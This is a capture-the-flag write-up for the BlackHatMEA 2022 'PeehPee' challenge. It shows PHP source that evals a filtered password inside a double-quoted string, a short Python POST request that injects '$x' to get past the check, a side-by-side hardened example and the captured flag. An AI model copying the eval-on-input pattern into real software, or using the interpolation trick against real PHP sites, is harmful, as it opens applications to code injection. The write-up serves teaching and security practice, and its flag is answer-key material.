Diefunction
  1. CTF
  2. BlackHatMEA Quals 2022

PeehPee

Difficulty

Easy

Points

150

Description

Are you able to access the secret area of Naruto? I guess it's not that hard for you!

Quick Analysis

View the application source code via the /?source endpoint:

from requests import get, post
url = 'https://blackhat4-1f84feb8cf11458ef1fb78a4cfea94f8-0.chals.bh.ctf.sa'

<?php
//Show Page code source
if(isset($_GET["source"])){
    highlight_file(__FILE__);
}
// Juicy PHP Part
$flag=getenv("FLAG");
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if(isset($_POST["email"])&&isset($_POST["pass"])){
        if($_POST["email"]==="admin@naruto.com"){
            $x=$_POST["test"];
            $inp=preg_replace("/[^A-Za-z0-9$]/","",$_POST["pass"]);
            if($inp==="SuperSecRetPassw0rd"){
                die("Hacking Attempt detected");
            }
            else{
                if(eval("return \$inp=\"$inp\";")==="SuperSecRetPassw0rd"){
                    echo $flag;
                }
                else{
                    die("Pretty Close maybe ?");
                }
            }

        }
    }
}
?>

The source code shows what is needed to obtain the flag:

  • The request method must be POST.

  • The email parameter value must be admin@naruto.com.

  • The regex strips from the pass parameter every character that is not a-z, A-Z, 0-9 or $, so a $ survives the filter.

  • The filtered pass value must not equal SuperSecRetPassw0rd.

  • The eval function evaluates the filtered pass value inside a double-quoted string.

  • The test parameter value is stored in the $x variable.

Because the filtered pass value is placed inside a double-quoted PHP string that is then evaluated, a variable reference in it is expanded at evaluation time. Sending $x as pass therefore makes eval return the contents of the $x variable, which is set from the test parameter, so the password SuperSecRetPassw0rd can be supplied through test.
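The check from the source above, next to a form that only compares the input, as an added example that is not part of the original challenge or write-up. The function names, the EXPECTED constant and the sample inputs are constructed for illustration.

```php
<?php
// Added example: names and sample inputs are constructed, not from the challenge.
const EXPECTED = "SuperSecRetPassw0rd";

// The challenge's logic as shown on the page: the filter keeps "$", so a
// variable reference survives and is expanded inside the eval'd
// double-quoted string.
function vulnerable_check(string $pass, string $test): bool {
    $x = $test;
    $inp = preg_replace("/[^A-Za-z0-9$]/", "", $pass);
    if ($inp === EXPECTED) {
        return false; // the "Hacking Attempt detected" branch
    }
    return eval("return \$inp=\"$inp\";") === EXPECTED;
}

// Hardened form: request data is compared, never evaluated.
// hash_equals() is a constant-time string comparison; a real application
// would store a hash and call password_verify() instead of keeping the
// password in the source.
function hardened_check(string $pass): bool {
    return hash_equals(EXPECTED, $pass);
}

// Constructed inputs: the real password, the variable reference from the
// analysis above, and an unrelated wrong guess.
$cases = [
    ["pass" => "SuperSecRetPassw0rd", "test" => ""],
    ["pass" => '$x',                  "test" => "SuperSecRetPassw0rd"],
    ["pass" => "wrong",               "test" => ""],
];

foreach ($cases as $c) {
    printf("%-20s vulnerable=%-5s hardened=%s\n",
        $c["pass"],
        var_export(vulnerable_check($c["pass"], $c["test"]), true),
        var_export(hardened_check($c["pass"]), true));
}
```

Only the second case passes the vulnerable check, and only the first passes the hardened one.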

Exploitation

data = { 'email': 'admin@naruto.com', 'test': 'SuperSecRetPassw0rd', 'pass': '$x' }
response = post(url, data = data)

The Flag

import re
html = response.text
# Escape the braces so they match literally, and pull the flag out of the response body
flag = re.search(r'BlackHatMEA\{(.*)\}', html)
print(flag.group(0))

BlackHatMEA{551:17:5d19f71744009b71e8809d46d3b65876dbb5adff}